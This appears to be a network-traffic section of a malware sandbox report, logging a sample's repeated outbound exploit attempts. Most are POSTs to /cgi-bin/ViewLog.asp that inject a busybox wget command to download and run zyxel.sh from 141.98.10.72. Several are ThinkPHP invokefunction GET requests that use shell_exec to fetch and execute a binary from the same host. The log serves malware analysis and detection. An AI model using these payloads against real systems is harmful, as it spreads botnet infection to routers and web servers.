                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:34.055888891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:35.303844929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.767694950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.887543917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:52.871217012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.582370043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:53.540638924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.143324262.148.130.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.468627930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.143850631.200.46.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.469877958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.144064831.200.64.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.473618984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.1445990112.213.88.18980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:35.161079884 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:35.560292959 CET406INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:24 GMT
                                                        Server: Apache/2
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.143829688.221.134.9780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:35.353060007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:35.544276953 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:35 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:35 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 38 36 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 31 35 26 23 34 36 3b 63 64 64 34 66 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5d86dd58&#46;1707899615&#46;cdd4f26</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.144446288.218.17.10480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:35.366864920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:35.571620941 CET355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:33:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.1444896112.185.184.15880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:35.781338930 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.144267894.121.16.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.008547068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.143710062.29.39.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.008583069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.144819694.131.64.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.132381916 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:36.251127958 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:33:36 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3560
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ezproxies.com
                                                        X-Cache-Lookup: NONE from ezproxies.com:8080
                                                        Via: 1.1 ezproxies.com (squid/3.5.20)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.144308631.136.194.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.235997915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:36.935730934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:38.311696053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:41.095587969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.727343082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:57.734930038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
